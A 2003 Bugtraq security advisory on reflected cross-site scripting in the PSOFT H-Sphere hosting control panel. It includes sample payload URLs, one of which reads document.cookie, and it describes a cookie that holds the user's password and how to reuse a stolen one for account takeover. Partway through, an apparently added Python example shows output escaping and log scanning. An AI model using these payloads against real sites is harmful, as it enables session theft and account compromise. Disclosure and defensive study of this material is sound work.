104096 2003-06-09  22:18  /134 lines/ Lorenzo Hernandez Garcia-Hierro <novappc@novappc.com>
Imported: 2003-06-09  22:18  by Brevbäraren
External recipient: Bugtraq <bugtraq@securityfocus.com>
External replies to: novappc@novappc.com
Recipient: Bugtraq (import) <5185>
Subject: PSOFT H-Sphere Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Product: PSOFT H-Sphere ( Hosting Control Panel )
Vendor: PSOFT ( Positive Software Corporation )
Versions:
         VULNERABLE

         - 2.3.x
         - 2.2.x
         - 2.1.x
         - 2.0.x

         NOT VULNERABLE

         - ?
---------------------

Description:

H-Sphere is a scalable multiserver web hosting control panel which
provides complete hosting automation for Linux, BSD and Win2000
platforms, is easy to use, and has an extensive user interface, a
billing solution, and an integrated trouble ticket system.

-----------------------------------------
SECURITY HOLES FOUND and PROOFS OF CONCEPT:
-----------------------------------------

I encountered a lot of XSS ( Cross Site Scripting ) vulnerabilities
in the PSOFT product called H-Sphere, located in the template
inclusion system.  The flaw is in the way the template system
includes an HTML template page: if the page does not exist, the
system prints an error like this:

Unknown template : '[PATH TO NON EXISTENT TEMPLATE PAGE]'

With this you can insert HTML and script code by passing it in the
URL, like this:

http://[TARGET]/[PATH TO PSOFT H-SPHERE INSTALLATION]/servlet/psoft.hsphere.CP/[VALID AND LOGGED USER]/[ID]/[PATH OF H-SPHERE USER SCRIPTS]/servlet/psoft.hsphere.CP?template_name=[HERE COMES YOUR CODE]


The new error page prints this:


Unknown template : '[HERE COMES YOUR CODE]'

The user's web browser then executes all the code and scripts included
in the new error page.  This can be used to steal user cookies, like
this:

MACTOKEN=[USER]|0000000xxxxxx|0xxxxx0000xxxx0000xxxx0000xxxx00

STRUCTURE OF THE H-SPHERE COOKIE :

MACTOKEN=[USERNAME] | [ USER PASSWORD ] | [ USER SESSION ID ]

You can modify your own H-Sphere cookie according to the stolen user
cookie and use the system with that user's credentials; think about
modifying user hosting plans... ;-) .

Note: the user must be validly logged in at all times, or the
attacker must use a specially crafted URL to include commands on the
client side through the template system.  I'm thinking of some public
URLs...


--------------
    SAMPLES
--------------

http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP?action=login&ftemplate=[MORE CODE AND XSS]&requestURL="><h1>XSS%20in%20PSOFT%20SPHERE<a%20href="&login=[USERNAME]&password=[PASSWORD]

http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<H1>xss</H1>

http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<IFRAME>

http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<h1>XSS

http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<script>alert(document.cookie);</script>


All URLs that take the template, ftemplate or template_name URL
input are affected by this type of XSS attack.
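To make the reflection described above concrete, here is an added example (not H-Sphere's code; Python is used instead of the product's Java servlet, and the host, paths and sample request are constructed placeholders): a stand-in for the "Unknown template" error page in its unescaped and HTML-escaped forms, plus a check that flags request URLs whose template, ftemplate, template_name or requestURL values carry markup, for use over web server access logs.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed stand-in for the error page the advisory describes: the
# requested template name is copied into the response verbatim, so any
# markup in it is interpreted by the browser (reflected XSS).
def render_error_unsafe(template_name: str) -> str:
    return f"<html><body>Unknown template : '{template_name}'</body></html>"

# Hardened form: HTML-escape the reflected value (quotes included) so the
# browser renders it as text instead of executing it.
def render_error_safe(template_name: str) -> str:
    escaped = html.escape(template_name, quote=True)
    return f"<html><body>Unknown template : '{escaped}'</body></html>"

# Query parameters the advisory names as being reflected into the page.
REFLECTED_PARAMS = ("template_name", "ftemplate", "template", "requestURL")

def suspicious_params(url: str) -> dict:
    """Return reflected parameters of a request URL whose values carry markup.

    Meant for scanning access logs for attempts against the template
    inclusion input: a legitimate template name contains no <, >, ' or ".
    """
    query = parse_qs(urlparse(url).query, keep_blank_values=True)
    hits = {}
    for name in REFLECTED_PARAMS:
        for value in query.get(name, []):
            if any(ch in value for ch in "<>\"'"):
                hits[name] = value
    return hits

# Constructed sample request modelled on the advisory's URLs (placeholder host).
SAMPLE_REQUEST = ("http://hsphere.example/servlet/psoft.hsphere.CP/user1/42/"
                  "psoft.hsphere.CP?template_name=<H1>xss</H1>")

if __name__ == "__main__":
    print(render_error_safe("<H1>xss</H1>"))
    print(suspicious_params(SAMPLE_REQUEST))
```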


-------------------------
| CONCLUSIONS AND NOTES |
-------------------------

All the URLs that use this template inclusion input are affected by
this hole.  User data and cookies can be stolen through it without
permission.  In some conditions we can pass server-based commands.
The server can pick them up when sent specially crafted URLs and
input values.  We can enter another user's domain configuration by
passing a specific domain id value.

- I tested this in the official PSOFT demo and it worked, but recently
they changed the demo and don't allow me to enter the system.  The
system says a Generic Error .  ;-).

-----------
| CONTACT |
-----------

Lorenzo Manuel Hernandez Garcia-Hierro
 --- Computer Security Analyzer ---
 --Nova Projects Professional Coding--
 PGP: Keyfingerprint
 B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
 ID: 0x9C38E1D7
 **********************************
 www.novappc.com
 security.novappc.com
 www.lorenzohgh.com
 ______________________